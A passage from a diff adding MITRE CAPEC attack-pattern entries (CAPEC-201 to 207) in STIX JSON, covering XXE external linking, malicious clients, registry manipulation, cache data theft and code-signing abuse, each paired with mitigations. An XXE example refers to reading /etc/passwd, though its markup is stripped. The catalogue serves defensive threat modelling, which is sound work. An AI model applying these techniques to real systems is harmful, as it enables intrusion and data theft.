This can allow an adversary to open arbitrary files or connections, which may further lead to the adversary gaining access to information on the system that they would normally be unable to obtain.", + "external_references": [ + { + "external_id": "CAPEC-201", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/201.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "XXE (Xml eXternal Entity) Attack, Beyond Security", + "external_id": "REF-73", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securitynews/6D0100A5PU.html" + }, + { + "description": "CESA-2007-002 - rev 2: Sun JDK6 breaks XXE attack protection", + "external_id": "REF-74", + "source_name": "reference_from_CAPEC", + "url": "http://scary.beasts.org/security/CESA-2007-002.html" + } + ], + "id": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Serialized Data External Linking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software", + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n The following DTD would attempt to open the /dev/tty device:\n ]>\n A malicious actor could use this crafted DTD to reveal sensitive information.\n ", + "\n The following XML snippet would attempt to open the /etc/passwd file:\n \n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an adversary records all instances of web services that process requests with serialized data.

  2. Techniques
    Use an automated tool to record all instances of URLs that process requests with serialized data.
    Use a browser to manually explore the website and analyze how the application processes serialized data requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious data message that contains references to sensitive files.

  2. Launch an External Linking attack: Send the malicious crafted message containing the reference to a sensitive file to the target URL.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target must follow external data references without validating the validity of the reference target." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "To send serialized data messages with maliciously crafted schema." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure the serialized data processor to only retrieve external entities from trusted sources.", + "id": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-201-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d8b8b0b-8f2d-4cfd-a9fa-dd14e071f340", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5e577722-adf8-4c68-bfc3-18c7b2e3cd69", + "target_ref": "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. 
Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. 
However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in authorization in order to modify content within a registry (e.g., Windows Registry, Mac plist, application registry). Editing registry information can permit the adversary to hide configuration information or remove indicators of compromise to cover up activity. Many applications utilize registries to store configuration and service information. As such, modification of registry information can affect individual services (affecting billing, authorization, or even allowing for identity spoofing) or the overall configuration of a targeted application. For example, both Java RMI and SOAP use registries to track available services. 
Changing registry values is sometimes a preliminary step towards completing another attack pattern, but given the long term usage of many registry values, manipulation of registry information could be its own end.", + "external_references": [ + { + "external_id": "CAPEC-203", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/203.html" + }, + { + "external_id": "CWE-15", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/15.html" + }, + { + "description": "Modify Registry", + "external_id": "T1112", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1112" + }, + { + "description": "Plist Modification", + "external_id": "T1647", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1647" + } + ], + "id": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulate Registry Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Manipulating registration information can be undertaken in advance of a path traversal attack (inserting relative path modifiers) or buffer overflow attack (enlarging a registry value beyond an application's ability to store it)." 
+ ], + "x_capec_parent_of_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--93bedd5b-70cc-48a0-a7c9-09b3800bd6bc", + "attack-pattern--943fa8f4-b777-4f3c-984b-9f620e50c70b" + ], + "x_capec_prerequisites": [ + "The targeted application must rely on values stored in a registry.", + "The adversary must have a means of elevating permissions in order to access and modify registry content through either administrator privileges (e.g., credentialed access), or a remote access tool capable of editing a registry through an API." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The adversary requires privileged credentials or the development/acquiring of a tailored remote access tool." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys.", + "id": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cc7d659b-2cb2-439c-aea4-42aea4f82adc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": 
"3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", + "id": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--999b1481-d5c3-444d-8eed-b7f921aa8bdf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking using an allowlist of applications on your system. 
Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90f1e2e6-849c-4469-b78d-75ed3dfe70e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. 
This can result in the disclosure of sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-204", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-524", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/524.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + } + ], + "id": "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Lifting Sensitive Data Embedded in Cache", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Application Cache: An adversary first identifies an application that utilizes a cache. This could either be a web application storing data in a browser cache, or an application running on a separate machine. The adversary examines the cache to determine file permissions and possible encryption.

  2. Techniques
    Use probing tools to look for application cache files on a machine.
    Use a web application and determine if any sensitive information is stored in browser cache.

Experiment

  1. Attempt to Access Cache: Once the cache has been discovered, the adversary attempts to access the cached data. This often requires previous access to a machine hosting the target application.

  2. Techniques
    Use priviledge escalation to access cache files that might have strict privileges.
    If the application cache is encrypted with weak encryption, attempt to understand the encryption technique and break the encryption.

Exploit

  1. Lift Sensitive Data from Cache: After gaining access to cached data, an adversary looks for potentially sensitive information and stores it for malicious use. This sensitive data could possibly be used in follow-up attacks related to authentication or authorization.

  2. Techniques
    Using a public computer, or gaining access to a victim's computer, examine browser cache to look for sensitive data left over from previous sessions.
", + "x_capec_prerequisites": [ + "The target application must store sensitive information in a cache.", + "The cache must be inadequately protected against attacker access." + ], + "x_capec_resources_required": [ + "The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. 
Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim's computer. This differs from CAPEC-673, because the adversary is performing the code signing.", + "external_references": [ + { + "external_id": "CAPEC-206", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/206.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Subvert Trust Controls:Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + }, + { + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien, W32.Stuxnet Dossier, 2010--11, Symantec", + "external_id": "REF-699", + "source_name": "reference_from_CAPEC", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 3: How software becomes compromised, 2020--03---11, Microsoft", + "external_id": "REF-700", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/03/11/guarding-against-supply-chain-attacks-part-3-how-software-becomes-compromised/" + }, + { + "description": "Operation Wilted Tulip: Exposing a cyber espionage apparatus, 2017--07, ClearSky cyber security and Trend Micro", + "external_id": "REF-714", + 
"source_name": "reference_from_CAPEC", + "url": "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "id": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signing Malicious Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In the famous Stuxnet malware incident, two digital certificates were compromised in order to sign malicious device drivers with legitimate credentials. The signing resulted in the malware appearing as trusted by the system it was running on, which facilitated the installation of the malware in kernel mode. This further resulted in Stuxnet remaining undetected for a significant amount of time. [REF-699]\n ", + "\n The cyber espionage group CyberKittens leveraged a stolen certificate from AI Squared that allowed them to leverage a signed executable within Operation Wilted Tulip. This ultimately allowed the executable to run as trusted on the system, allowing a Crowd Strike stager to be loaded within the system's memory. [REF-714]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or acquired normally through a certificate authority.

  2. Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach

Experiment

  1. The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally.

Exploit

  1. Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary.

", + "x_capec_prerequisites": [ + "The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer's name.)" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure digital certificates are protected and inaccessible by unauthorized uses.", + "id": "course-of-action--737363d1-53a4-4025-939a-52e2cf03ec70", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0acb6c13-3463-4a54-baf8-e5daa1cd55d0", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--737363d1-53a4-4025-939a-52e2cf03ec70", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a digital certificate has been compromised it should be revoked and regenerated.", + "id": "course-of-action--d8bebf47-98bc-4b7d-80b3-0f326ee27bd9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], 
+ "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b665d54a-09fd-43ba-b66c-0b41dde234a9", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8bebf47-98bc-4b7d-80b3-0f326ee27bd9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if a piece of software has a valid and trusted digital signature, it should be assessed for any weaknesses and vulnerabilities.", + "id": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f7d911b0-644f-4efc-a169-75ba6c73e3eb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--caf1260a-2cbc-467a-aa8a-f66f1d2107c9", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.", + "external_references": [ + 
{ + "external_id": "CAPEC-207", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/207.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-75", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Greasemonkey" + }, + { + "description": "Firebug", + "external_id": "REF-76", + "source_name": "reference_from_CAPEC", + "url": "http://getfirebug.com/" + }, + { + "description": "Mozilla Firefox Add-ons", + "external_id": "REF-77", + "source_name": "reference_from_CAPEC", + "url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" + } + ], + "id": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Removing Important Client Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The adversary reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. 
Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the adversary simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.", + "The adversary uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the adversary directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.

  2. Techniques
    The adversary probes by exploring an application's functionality and its underlying mapping to server-side components.
    The adversary reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.

Experiment

  1. Determine which functionality to disable or remove: The adversary tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.

  2. Techniques
    The adversary reverse engineers the client-side code to determine which functionality to disable or remove.

Exploit

  1. Disable or remove the critical functionality from the client code: Once the functionality has been determined, the adversary disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.

  2. Techniques
    The adversary disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.
", + "x_capec_extended_description": "\n Adversaries can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an adversary can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05" + ], + "x_capec_prerequisites": [ + "The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client." + ], + "x_capec_resources_required": [ + "The adversary must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary." 
+ ], + "x_capec_skills_required": { + "High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.", + "Low": "The adversary installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", + "id": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5ee791d-5a7a-424b-8425-74c45b4c310e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", + "id": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-1", + "object_marking_refs": [ + 
